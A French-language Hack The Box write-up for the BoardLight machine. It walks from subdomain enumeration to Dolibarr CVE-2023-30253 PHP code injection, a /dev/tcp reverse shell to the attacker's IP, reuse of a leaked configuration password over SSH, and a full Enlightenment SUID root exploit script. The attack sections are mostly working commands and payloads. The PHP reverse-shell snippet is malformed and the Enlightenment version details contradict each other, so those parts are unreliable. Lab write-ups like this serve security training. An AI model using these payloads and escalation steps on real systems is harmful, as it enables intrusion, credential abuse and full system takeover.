BoardLight HackTheBox (Writeup)

Skills:

Subdomain Enumeration
Dolibarr 17.0.0 Exploitation - CVE-2023-30253
Information Leakage (User Pivoting)
Enlightenment SUID Binary Exploitation [Privilege Escalation]

Reconnaissance

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.11.11 -oG allPorts

Analyse des ports ouverts avec extractPorts:

Utilisation de la fonction extractPorts pour afficher de manière synthétique les ports ouverts et les copier dans le clipboard (22,80)

Scan de la version des ports avec Nmap:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,80 10.10.11.11 -oN targeted

Port 80 - HTTP

Analyse avec WhatWeb : Nous identifions un email contenant un nom de domaine : board.htb.

Pour résoudre les noms de domaine en adresses IP via DNS, on insère dans le fichier /etc/hosts le nom de domaine associé à son adresse IP:

Énumération Web

Recherche de directories avec Feroxbuster :

feroxbuster -u http://board.htb/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100

Aucun résultat pertinent n’est trouvé.

Énumération des sous-domaines avec Gobuster :

gobuster vhost -u http://board.htb/ --append-domain -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 200

Nous découvrons un sous-domaine : crm.board.htb..

Nous l’ajoutons à /etc/hosts

Vulnérabilité CMS Dolibarr

Connexion sans authentification : Une tentative de connexion avec des identifiants aléatoires connecte en tant qu’administrateur mais sans permissions.

Exploitation Manuelle

Création d’un site malveillant :

Dans la section de création de site, nous insérons un code PHP malveillant :

<section id="pwned" contenteditable="true"><?PhP system("whoami"); ?></section>

Nous confirmons l’exécution de commandes.

Reverse Shell :

Mise en écoute :

nc -nvlp 443

Code PHP pour reverse shell :

<?phP
system($_GET['bash -c "bash -i >%26 /dev/tcp/10.10.14.47/443 0>%261"']);
?>

Exploitation Automatique

GitHub - Rubikcuv5/cve-2023-30253: Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data.GitHub

Installation des dépendances :

pip3 install -r requirements.txt

Exécution du script :

Test de commande (whoami)

python3 exploit.py --url http://crm.board.htb -u admin -p admin -c whoami

Reverse shell

python3 exploit.py --url http://crm.board.htb -u admin -p admin -r 10.10.14.47 443

Traitement de la Terminal

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

User Pivoting - Larissa

L'objectif est de réaliser un pivoting vers l'utilisateur larissa.

Énumération d'informations

Dans le répertoire web situé dans htbdocs, nous trouvons un dossier nommé conf contenant un fichier conf.php. Ce fichier contient les informations suivantes :

password: serverfun2$2023!!

Connexion SSH

Avec les informations récupérées, essayons de nous connecter à la machine via SSH :

ssh [email protected]

Résultat : La connexion fonctionne.

Flag user.txt :)

Élévation de privilèges

SUID - Enlightenment

Nous commençons par rechercher les fichiers SUID appartenant à notre utilisateur. Pour ce faire, exécutez la commande suivante :

find / -perm -4000 2>/dev/null

En analysant la sortie, nous remarquons la présence du binaire enlightenment.

Nous explorons les vulnérabilités associées à ce binaire. Après quelques recherches, nous identifions un exploit applicable pour la version 0.25.4.

Enlightenment v0.25.3 - Privilege escalationExploit Database

Cependant, en vérifiant la version actuelle d'Enlightenment installée sur le système, nous trouvons qu'il s'agit de la version 0.23.1, une version plus ancienne.

Nous testons l'exploit suivant pour exploiter la vulnérabilité :

#!/usr/bin/bash

file="/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
rm -rf /tmp/exploit
rm -rf /tmp/net

./exploit.sh

Après l'exécution de l'exploit, nous obtenons un shell avec les privilèges root.

Flag root.txt :)

Mis à jour il y a 1 an

hashtagReconnaissance

hashtagPort 80 - HTTP

hashtagÉnumération Web

hashtagVulnérabilité CMS Dolibarr

hashtagExploitation Manuelle

hashtagExploitation Automatique

hashtagReverse shell

hashtagTraitement de la Terminal

hashtagUser Pivoting - Larissa

hashtagÉnumération d'informations

hashtagConnexion SSH

hashtagFlag user.txt :)

hashtagÉlévation de privilèges

hashtagSUID - Enlightenment

hashtagFlag root.txt :)